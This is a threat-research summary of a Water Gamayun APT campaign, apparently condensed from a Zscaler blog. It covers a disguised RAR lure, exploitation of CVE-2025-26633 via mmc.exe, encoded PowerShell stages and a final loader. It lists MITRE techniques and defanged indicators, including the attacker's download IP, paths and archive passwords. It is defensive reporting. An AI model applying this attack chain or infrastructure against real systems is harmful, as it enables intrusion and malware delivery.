Threat Research

Zscaler Threat Hunting Discovers and Reconstructs a Sophisticated Water Gamayun APT Group Attack

ZScaler
Zscaler Threat Hunting Discovers and Reconstructs a Sophisticated Water Gamayun APT Group Attack

Zscaler reconstructed a multi-stage intrusion attributed to the Water Gamayun APT that used a compromised BELAY Solutions site and a lookalike domain to deliver a double-extension RAR disguised as a PDF, exploit MSC EvilTwin (CVE-2025-26633) via mmc.exe, and chain hidden PowerShell stages to deploy a final ItunesC loader. Zscaler attributed the campaign to Water Gamayun based on unique TTPs including MSC EvilTwin exploitation, nested Base64/UTF-16LE PowerShell obfuscation, trusted-binary proxy execution via mmc.exe, window-hiding tradecraft, and dual-path infrastructure patterns #WaterGamayun #CVE-2025-26633

Keypoints

  • Attack began with a Bing search redirect from a likely-compromised belaysolutions[.]com to a lookalike domain belaysolutions[.]link hosting a double-extension RAR (pdf[.]rar) masqueraded as a PDF brochure.
  • Opening the archive dropped an .msc file that exploited MSC EvilTwin (CVE-2025-26633) to load a malicious MMC snap-in and execute embedded TaskPad commands.
  • Stage-1 PowerShell used -EncodedCommand to download UnRAR.exe and a password-protected RAR, extract the next stage, and Invoke-Expression on decoded scripts.
  • Stage-2 compiled a small C# class (WinHpXN) to hide console windows, displayed a decoy PDF, and downloaded/executed the final loader ItunesC.exe multiple times for persistence.
  • Final payload (ItunesC.exe) installed backdoors or stealers; Zscaler could not fully confirm the exact malware due to non-responsive C2, though Water Gamayun’s toolkit includes EncryptHub, SilentPrism, DarkWisp, and Rhadamanthys.
  • Attribution to Water Gamayun was based on rare MSC EvilTwin usage, characteristic nested Base64/UTF-16LE obfuscation with underscore-replace, process-hiding code, randomized dual-path infrastructure, and social-engineering lures.

MITRE Techniques

  • [T1203 ] Exploitation for Client Execution – Exploited MSC EvilTwin (CVE-2025-26633) to execute a malicious MMC snap-in (‘The first payload exploited CVE-2025-26633, a weakness in MMC’s multilingual path resolution.’)
  • [T1218 ] Signed Binary Proxy Execution – Abused mmc.exe to load and run a malicious snap-in and associated TaskPad commands as a trusted binary proxy (‘mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands’)
  • [T1059.001 ] PowerShell – Used encoded PowerShell (-EncodedCommand) and Invoke-Expression to decode, chain, and execute staged scripts (‘Decoded via -EncodedCommand, this script downloads UnRAR.exe and a password-protected RAR… then Invoke-Expression on the extracted script.’)
  • [T1027 ] Obfuscated Files or Information – Employed nested Base64 and UTF-16LE encoding with underscore-replace string cleanup to hide payloads and commands (‘nested Base64, UTF-16LE encoding, and runtime string cleanup’)
  • [T1105 ] Ingress Tool Transfer – Downloaded auxiliary tools and archives (UnRAR.exe, password-protected RARs) from remote hosting to deliver next-stage payloads (‘this script downloads UnRAR.exe and a password-protected RAR, extracts the next stage’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Used HTTP(S) downloads and C2 hosting on a single IP with randomized path prefixes for payload delivery and potential command-and-control (‘hosted on a single IP (103[.]246[.]147[.]17) with two randomized path prefixes (`/cAKk9xnTB/` and `/yyC15x4zbjbTd/`)’)
  • [T1055 ] Process Injection – Injected or executed malicious code within mmc.exe context to run snap-in payloads and TaskPad commands (‘to inject code into mmc.exe, leveraging TaskPad snap-in commands to kick off a series of hidden PowerShell stages.’)
  • [T1204.002 ] User Execution: Malicious File – Relied on user opening a masqueraded file (pdf[.]rar) to gain execution (‘Masqueraded RAR URL: belaysolutions[.]link/pdf/hiring_assistant[.]pdf[.]rar’)
  • [T1564 ] Defense Evasion: Hidden/Obfuscated Execution – Hid console windows via a compiled C# class (WinHpXN calling ShowWindow) to reduce user visibility of malicious activity (‘compiles C# WinHpXN to hide console windows, displays a decoy PDF, and downloads, extracts, and executes the final loader’)

Indicators of Compromise

  • [Files & Hashes ] Payloads and tooling observed – Hiring_assistant.pdf.rar (MD5: ba25573c5629cbc81c717e2810ea5afc), UnRAR.exe (MD5: f3d83363ea68c707021bde0870121177), and 4 more hashes.
  • [Archive Passwords ] Passwords used to protect staged RARs – k5vtzxdeDzicRCT, jkN5yyC15x4zbjbTdUS3y
  • [Network & Paths ] Hosting IP and randomized delivery paths – IP 103[.]246[.]147[.]17 with paths such as /cAKk9xnTB/UnRAR.exe and /yyC15x4zbjbTd/ItunesC.rar
  • [Domains ] Legitimate and lookalike domains used in delivery – belaysolutions[.]com (legitimate, potentially compromised), belaysolutions[.]link (malicious)

Read more: https://www.zscaler.com/blogs/security-research/water-gamayun-apt-attack